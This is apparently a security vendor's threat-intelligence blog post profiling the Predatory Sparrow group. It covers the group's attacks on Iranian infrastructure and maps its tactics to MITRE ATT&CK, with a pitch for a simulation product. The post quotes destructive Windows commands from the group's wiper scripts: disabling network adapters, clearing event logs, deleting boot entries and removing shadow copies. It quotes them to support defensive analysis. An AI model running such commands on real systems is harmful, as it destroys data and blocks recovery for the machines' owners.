.svg)
.svg)
Predatory Sparrow: Inside the Cyber Warfare Targeting Iran's Critical Infrastructure
Predatory Sparrow is a cyber-sabotage group known for its highly disruptive operations, with a particular focus on targeting Iranian infrastructure and institutions. The group has publicly claimed responsibility for a series of high-profile cyberattacks against various sectors in Iran, including critical infrastructure, government organizations, and financial institutions. Their operations are often marked by substantial operational disruption, deliberate data destruction, and provocative public messaging aimed at taunting their targets. Analysts widely believe that Predatory Sparrow is affiliated with Israel, operating within the broader context of the ongoing cyber shadow war between the two nations, which has seen both offensive and defensive cyber operations unfold over the past decade.
The group has demonstrated a broad capability to impact diverse segments of Iran's national infrastructure, highlighting its sophisticated operational reach. One of their most notable operations involved Iran's national railway system, where cyberattacks led to widespread paralysis and significant operational delays, illustrating the group's ability to disrupt essential public services. Predatory Sparrow has also conducted attacks on Iranian industrial targets, such as steel companies, causing operational disruptions and triggering fires, further emphasizing the destructive nature of their campaigns. In the financial sector, the group has targeted major institutions, including Bank Sepah and the Nobitex cryptocurrency exchange. In a particularly high-profile financial attack, Predatory Sparrow claimed to have "burned" $90 million in cryptocurrency and published Nobitex's entire source code, infrastructure documentation, and internal privacy research and development [1], a move that exposed both operational vulnerabilities and sensitive intellectual property. These actions are widely interpreted as part of a broader strategy to destabilize Iran, disrupt critical operations, and respond to perceived Iranian cyber or geopolitical aggressions.
In this post, we will explore the major historical operations of Predatory Sparrow, highlight their notable attacks on Iran's critical infrastructure and financial systems, and examine the group's tactics, techniques, and procedures (TTPs) to understand how they conduct disruptive cyber operations. In the end, we will show how Picus helps defend against this group.
Simulate APT Attacks with 14-Day Free Trial of Picus Platform
History & Major Activities of Predatory Sparrow Group
-
September 2019 - A cyberattack targeted Alfadelex Trading, a Syrian company offering currency exchange and money transfer services [2].
-
January 2020 - Cham Wings Airlines, a privately owned Syrian airline, was attacked [2].
-
February - April 2020 - The network infrastructures of Afrada and the Katerji Group, both Syrian-based firms, were seized [2].
-
November 2020 - Predatory Sparrow issued a threat to attack the Banias Oil Refinery in Syria, though it remains uncertain whether the attack took place [2].
-
July 2021 - Predatory Sparrow attacked Iran's national railway system, disrupting services and displaying messages like "cyberattack" on station boards. This attack utilized the "Meteor" wiper malware [2].
-
27 June 2022 - The group claimed responsibility for a cyberattack on an Iranian steel manufacturing plant. The advanced operation triggered a major fire at the site, leading to significant physical damage.
-
December 2023 - Predatory Sparrow claimed that it was behind a cyberattack that disrupted a large number of gas stations across Iran. In a statement posted on X (formerly Twitter), the group said the operation had disabled most of Iran's fuel pumps, describing it as a retaliatory move against the actions of the Islamic Republic and its regional proxies [3].
-
17 June 2025 - Soon after Israeli airstrikes on Iran, a Predatory Sparrow cyberattack targeted the state-owned Bank Sepah, disrupting its services. The group claimed to have erased the bank's data and accused it of financing Iran's military [4]. The group additionally claimed responsibility for a strike on the Iranian cryptocurrency exchange Nobitex the next day, in which they took $90 million in crypto assets and rendered them unrecoverable by transferring them to inaccessible addresses [1].
ATT&CK Mapping (TTPs) of Predatory Sparrow Group
Tactic: Reconnaissance
T1592 Gather Victim Host Information
In a Predatory Sparrow attack against Iran, researchers found a setup.bat script that performs host discovery by checking the machine's hostname against PIS-APP, PIS-MOB, WSUSPROXY, and PIS-DB; if a match is found, it aborts and removes the malicious folder. With this behaviour, the malware specifically avoids executing on hosts with PIS (Passenger Information System) names—systems that update platform boards—ensuring the attackers' message will be displayed properly on those public-facing devices [2].
Tactic: Execution
T1053.005 Scheduled Task/Job: Scheduled Task
Adversaries may abuse the Windows Task Scheduler to schedule initial or recurring execution of malicious code. Predatory Sparrow's msrun.bat, one of the scripts used in the attack on Iranian Railways and the Ministry of Roads and Urban Development, is responsible for unleashing a wiper: it moves wiper-related files to C:\temp. The script then creates a scheduled task named mstask, configured to run the wiper a single time at 23:55:00 [2].
T1059 Command and Scripting Interpreter
Predatory Sparrow used a sequence of Windows batch files — setup.bat → update.bat (started by setup.bat) — where update.bat uses the hardcoded password "hackemall" to unpack the next-stage scripts cache.bat, msrun.bat, and bcd.bat. This activity uses native Windows batch scripting to stage and execute multi‑stage payloads, and the extracted cache.bat disables all network adapters on the machine with the command [2]:
|
powershell -Command "Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }" > NUL |
T1059.005 Command and Scripting Interpreter: Visual Basic
Both attacks in Syria by Predatory Sparrow began with a VBS dropper (resolve.vbs) that extracted a password-protected RAR to C:\Program Files\Windows NT\Accessories\, containing a second RAR and three VBS scripts. Resolve.vbs executed those scripts sequentially: the first enumerated installed programs to detect Kaspersky and attempted to uninstall it using hardcoded domain credentials. The second checked for Kaspersky's avp.exe and attempted to remove its license, and the final script extracted the second-stage RAR and executed its contained executable — a Stardust wiper variant [2].
Tactic: Defense Evasion
T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
Attackers often encrypt or encode file contents to hide malicious artifacts and evade detection during intrusions. The Meteor wiper attributed to the Predatory Sparrow group used an encrypted configuration file named msconf.conf and also stored encrypted log files during its Iran-targeted attacks. A helper script to decrypt the configuration file and logs is provided below [2]:
|
from malduck import xor, u32 |
T1070.001 Indicator Removal: Clear Windows Event Logs
A script named bcd.bat used by Predatory Sparrow leverages wevtutil to delete Security, System, and Application Event Viewer logs, effectively erasing forensic evidence of activity [2]. With administrator privileges, the event logs can be cleared with the following utility commands:
|
wevtutil cl system |
T1562 Impair Defenses
Predatory Sparrow probes for third‑party antivirus (Kaspersky) and, when not found, targets built‑in protections. It has been observed to add attack‑related files and folders to Windows Defender's exclusion list. This behavior enables persistence and execution with a reduced chance of detection [2].
Tactic: Command and Control
T1071.001 Application Layer Protocol: Web Protocols
While some VBS scripts run, they issue GET requests to a command-and-control server to report progress using URLs of the form:
|
https://<C&C IP>/progress.php?hn=&dt=&st=&rs= |
The query parameters transmit the host name (hn), current timestamp (dt), the execution step (st), and information about whether Kaspersky AV is running (rs), with the C&C IP varying between attacks [2].
T1105 Ingress Tool Transfer
Adversaries may transfer tools or other files from external systems into a compromised environment; for example, a batch file used by the Predatory Sparrow Group downloads a CAB archive (env.cab) from the internal path \\railways.ir\sysvol\railways.ir\scripts\env.cab, and the use of that specific path indicates prior knowledge of the environment [2].
Tactic: Impact
T1485 Data Destruction
The main payload used by Predatory Sparrow against Iranian Railways and the Ministry of Roads and Urban Development is an executable named msapp.exe, a wiper designed to render infected machines unusable by locking them and wiping their contents. Upon execution, the malware hides its console window to reduce the chance of detection. The program records the phrase "Meteor has started" to an encrypted log file, suggesting the malware's internal name is "Meteor" [2].
T1490 Inhibit System Recovery
A malicious bcd.bat used by the threat actor Predatory Sparrow attempts to sabotage the Windows boot process by overwriting the boot configuration and then removing existing boot entries via the built-in BCDEdit utility using the command below [2]:
|
for /F "tokens=2" %%j in ('%comspec% /c "bcdedit -v | findstr identifier"') do bcdedit /delete %%j /f |
Also, native Windows utilities have been abused by adversaries to disable system recovery features. For example, vssadmin.exe or Windows Management Instrumentation (WMIC) can remove all volume shadow copies. The Predatory Sparrow wiper attempts to remove shadow copies by running both the vssadmin and wmic commands [2]:
|
vssadmin.exe delete shadows /all /quiet |
How Picus Simulates Predatory Sparrow Attacks?
We also strongly suggest simulating Predatory Sparrow Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Predatory Sparrow:
|
Threat ID |
Threat Name |
Attack Module |
|
77438 |
Predatory Sparrow Threat Group Campaign |
Windows Endpoint |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
Aliases of Predatory Sparrow Group
Predatory Sparrow is also known as: Gonjeshke Darande, Indra.
References
[1] "Inside the Nobitex Breach: What the Leaked Source Code Reveals About Iran's Crypto Infrastructure." Accessed: Oct. 15, 2025. [Online]. Available: https://www.trmlabs.com/resources/blog/inside-the-nobitex-breach-what-the-leaked-source-code-reveals-about-irans-crypto-infrastructure
[2] "Indra — Hackers Behind Recent Attacks on Iran," Check Point Research. Accessed: Oct. 15, 2025. [Online]. Available: https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/
[3] E. Groll, "Israel-linked hacking group claims attack on Iranian gas pumps," CyberScoop. Accessed: Oct. 15, 2025. [Online]. Available: https://cyberscoop.com/israel-iran-cyberattack-houthi/
[4] Wikipedia contributors, "Predatory Sparrow," Wikipedia, The Free Encyclopedia. [Online]. Available: https://en.wikipedia.org/wiki/Predatory_Sparrow
.png?width=353&height=200&name=Ivanti-EPMM-ET-preview-sept25%20(1).png)